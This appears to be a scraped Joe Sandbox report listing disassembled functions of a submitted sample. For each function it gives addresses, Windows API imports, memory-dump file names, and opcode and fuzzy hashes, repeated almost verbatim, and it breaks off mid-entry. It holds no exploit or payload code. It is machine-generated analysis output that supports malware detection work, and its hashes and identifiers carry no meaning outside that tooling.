                                                • Opcode Fuzzy Hash: c8564b734ccbaacaf3b0576976fb44c3c840db276b6d24103a14a80d5a63f89b
                                                • Instruction Fuzzy Hash: 6331C571A0CA4286FB609B71F44837A6BA1EF84B94F584035DA4EA7F54DF3CD444DB04
                                                Function 00007FF658556AA0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245COMMON
                                                Download Yara Rule
                                                APIs
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556B58
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556CAB
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556D83
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556D99
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF658557441), ref: 00007FF658556E15
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise
                                                • String ID: [ KeepUnwinding ]
                                                • API String ID: 2546344036-400895726
                                                • Opcode ID: f7ede3c50903ac8ce56ed10b7c6191f6e45cf248f9fd1a0be10d847b8a15258f
                                                • Instruction ID: cc5b5d654ba56421d9f1181bb6493871e6a406fcc303ad221c1a1a6794481307
                                                • Opcode Fuzzy Hash: f7ede3c50903ac8ce56ed10b7c6191f6e45cf248f9fd1a0be10d847b8a15258f
                                                • Instruction Fuzzy Hash: CAB16A32A09B8281EB94CF35E4402A933E5FB44B58F5C4136CE4DABB98DF39E599C354
                                                Function 00007FF6585B11A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                • String ID:
                                                • API String ID: 2933794660-0
                                                • Opcode ID: e16cdb098a0731bbeee2597424cfc557f813577fc17a189862b511b9686622a6
                                                • Instruction ID: 7e8746fb92928b9be4a238013a7761ed4b017577c9ff4a8be23c3c8e33332de5
                                                • Opcode Fuzzy Hash: e16cdb098a0731bbeee2597424cfc557f813577fc17a189862b511b9686622a6
                                                • Instruction Fuzzy Hash: 3D111C36B54F018AEB00CB70E8552A873A4FB19B68F580A31DA6D96BA4EF78D5548340
                                                Function 00007FF658582DB0 Relevance: 4.8, APIs: 3, Instructions: 256threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: SwitchThread
                                                • String ID:
                                                • API String ID: 115865932-0
                                                • Opcode ID: 4f0f7fa2d29b35e5cdd09d60c3db837712e860f8bd82e74dd6b70f6fc053caec
                                                • Instruction ID: c2f353c34efa9f51d5be2f0423a97e5bb77121b29425d3f42b7fa7aec68e0679
                                                • Opcode Fuzzy Hash: 4f0f7fa2d29b35e5cdd09d60c3db837712e860f8bd82e74dd6b70f6fc053caec
                                                • Instruction Fuzzy Hash: 76B19E71A18B4286EB909B78D8402BC77A0FB44B84F684136DA5DE7B95DF3CE481CB08
                                                Function 00007FF65856D1F0 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: @
                                                • API String ID: 3168844106-2766056989
                                                • Opcode ID: dd6d6a4e8923a7622559a3daf65e3807cab09e7ddf14f4fc5c8b3e1e00e80d67
                                                • Instruction ID: 5c10217492f5f81620ace290c66e7317a77f85884d15a58a81225b05b7b668c1
                                                • Opcode Fuzzy Hash: dd6d6a4e8923a7622559a3daf65e3807cab09e7ddf14f4fc5c8b3e1e00e80d67
                                                • Instruction Fuzzy Hash: 59916625A5C65281FBA09F36E84037863A0AF55B88F5D0435C95EE7EA5DF6EF880C708
                                                Function 00007FF65858E4B0 Relevance: 3.3, APIs: 2, Instructions: 344threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: SwitchThread
                                                • String ID:
                                                • API String ID: 115865932-0
                                                • Opcode ID: ab3dbcbadd1195aceb4dc0df65fd692d4c75df09f4a02271c42bf330f8f5443f
                                                • Instruction ID: 8e275105a0e5e3665514f13f773657f231168ee4806b6f5833b9a0056c3572cc
                                                • Opcode Fuzzy Hash: ab3dbcbadd1195aceb4dc0df65fd692d4c75df09f4a02271c42bf330f8f5443f
                                                • Instruction Fuzzy Hash: F7E17276A1969186EBA08F25E4003AD7371FB44B94F684132DA9DA3F98DF7CE441CB48
                                                Function 00007FF658561C50 Relevance: 3.2, APIs: 2, Instructions: 175COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF658557E5B,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF658561CEF
                                                • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF658557E5B,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF658561D4C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: EnabledFeaturesState
                                                • String ID:
                                                • API String ID: 1557480591-0
                                                • Opcode ID: 4d09a7d10696eb70978a5361604ff01ff8ee2d975502abada3cc5e0683543bbf
                                                • Instruction ID: b96533b1b85c7fc1173a34364b9b99dade3fe0c95f78fe1ee081aa89c493bd28
                                                • Opcode Fuzzy Hash: 4d09a7d10696eb70978a5361604ff01ff8ee2d975502abada3cc5e0683543bbf
                                                • Instruction Fuzzy Hash: F151E032F8822202FFE8546E906937616975BA9360F4D4539DA4EE7AC2CD3FDC024608
                                                Function 00007FF65857C3A0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: 5372820b8d61e945878c808cb8805ea97cbf8da8ac7b2002d2442fc1065395d5
                                                • Instruction ID: 82db991532ad5b73b1dadbe7d2827ce8569a2ee54dba4140506ccc558c29dd8f
                                                • Opcode Fuzzy Hash: 5372820b8d61e945878c808cb8805ea97cbf8da8ac7b2002d2442fc1065395d5
                                                • Instruction Fuzzy Hash: DE418F22B18A9181EB908F36994127963A1FF48BC4F5C9036DE4EE7F55DF3CE4108308
                                                Function 00007FF6585846E0 Relevance: 1.8, Strings: 1, Instructions: 564COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 0ee841b0041fd07083ad09a55eb67601aaff04cff13fea96335e112a1605f71b
                                                • Instruction ID: 538f3b0d83a06b26b47890c19182595a434fa255023d31622f7849425632b2bb
                                                • Opcode Fuzzy Hash: 0ee841b0041fd07083ad09a55eb67601aaff04cff13fea96335e112a1605f71b
                                                • Instruction Fuzzy Hash: 0442DA32A69A8681EA518F35E80027D77A1FB457A4F594236CE6EA3FD0DF3CE451C708
                                                Function 00007FF65856FE70 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ?
                                                • API String ID: 0-1684325040
                                                • Opcode ID: eb064bc1408a134021f5762006dc8a98f6b1344e3b1c1bba0f6a4c98f7415e32
                                                • Instruction ID: f696b96ed22d8d9a4fd152cc71beeb8a3a165154a545aec7a43921c8fba2142a
                                                • Opcode Fuzzy Hash: eb064bc1408a134021f5762006dc8a98f6b1344e3b1c1bba0f6a4c98f7415e32
                                                • Instruction Fuzzy Hash: 6512B132A18A8282EA94CB21E4447BD73A5FB55BD4F588231DA5EE3F94DF3CE441C748
                                                Function 00007FF65855BB60 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                                                • Instruction ID: e379c83f8a5965d71fff814e3439a14d777fcb5a214be40e9b80021165e0cbf2
                                                • Opcode Fuzzy Hash: ed46fb5e053d378f1610507a2dc2373cd927df4da4c90f69d846193864f28d75
                                                • Instruction Fuzzy Hash: 53D1BBB3A10B4987E7988F39A40926933A2FB45BE8F191235CE5D57B98DF38D910CB44
                                                Function 00007FF658585490 Relevance: 1.0, Instructions: 950COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce88b7bc960f67bff91534495d3b3fe2c5d14991d050d0a89b9e83d9d292686f
                                                • Instruction ID: e5ca11f17e91a0fb7aa6ebd61e82ffbd92600eb774ec154f427a85beebf30f5d
                                                • Opcode Fuzzy Hash: ce88b7bc960f67bff91534495d3b3fe2c5d14991d050d0a89b9e83d9d292686f
                                                • Instruction Fuzzy Hash: 7792C361A68B4685EA91DB35E8506B86395BF45BC4F6C4236D80FF3F61EF3CE0458B08
                                                Function 00007FF6585863B0 Relevance: .7, Instructions: 655COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02b1ad4ab20bfa8643531b44ce1abecbdb13974695cdd098e113f0528ef77cbf
                                                • Instruction ID: 8129b72d844ed02c937f86c18928a1ba4fc7f65ba9f8fff3e2170cc18bf238b4
                                                • Opcode Fuzzy Hash: 02b1ad4ab20bfa8643531b44ce1abecbdb13974695cdd098e113f0528ef77cbf
                                                • Instruction Fuzzy Hash: 42528E32B28B4186EB908F75E4441AD77E1FB44B88B284536DE5EA7F58CF3CE4558B08
                                                Function 00007FF658586D80 Relevance: .6, Instructions: 574COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 682f8704a4cd320b1df5fe49dbd43fa57fbd70317c3501b9b4593f4467cd6572
                                                • Instruction ID: 317177fe2250e75a286f42f00a033cb077f63b6137a2c724836147d98532d663
                                                • Opcode Fuzzy Hash: 682f8704a4cd320b1df5fe49dbd43fa57fbd70317c3501b9b4593f4467cd6572
                                                • Instruction Fuzzy Hash: 9C32B022B19B4686EB90CBB5D4402BC27A5EB047D8B284536DE1EB7F88DF38E455C748
                                                Function 00007FF658576860 Relevance: .4, Instructions: 431COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc34d1225eea2875a0b725fa0f8db207bf965f41219ae361d99d9ec02d6a9fa6
                                                • Instruction ID: 5cdf8b44db76ba4817d813371f3bf7dceeec072d57ea415417b5deae4ede697e
                                                • Opcode Fuzzy Hash: dc34d1225eea2875a0b725fa0f8db207bf965f41219ae361d99d9ec02d6a9fa6
                                                • Instruction Fuzzy Hash: F31262E2615B9681EE958B29C44436967E1FF05BE4F1CD235CE2C93BD4DF6CD494C204
                                                Function 00007FF6585EC880 Relevance: .4, Instructions: 430COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62520b32a1776006d55512af80ac8e0ed9ea9f0ad031f078303fc6a319a57c75
                                                • Instruction ID: 4bb490627eb984b3d89af819477230e960217adfe69f8668c6d7735670354cef
                                                • Opcode Fuzzy Hash: 62520b32a1776006d55512af80ac8e0ed9ea9f0ad031f078303fc6a319a57c75
                                                • Instruction Fuzzy Hash: DEF13862F3859386F7B84B389C017B96252EF91304F5C9274DA9E96FC8EE3DE9418344
                                                Function 00007FF658571930 Relevance: .4, Instructions: 412COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12da843875923fdc3eafda57ca72649bed6bc1ea7f40d8fdbfd8baac54bfade6
                                                • Instruction ID: c25a14d69a79035201b876453107040f792b9dfe8ac8df483a69d547bd60d31b
                                                • Opcode Fuzzy Hash: 12da843875923fdc3eafda57ca72649bed6bc1ea7f40d8fdbfd8baac54bfade6
                                                • Instruction Fuzzy Hash: D102A572A58A8686EB549F65D4406787764AB45BE4F48C336DA2EE7FD0CF3CE441C308
                                                Function 00007FF658571384 Relevance: .4, Instructions: 357COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
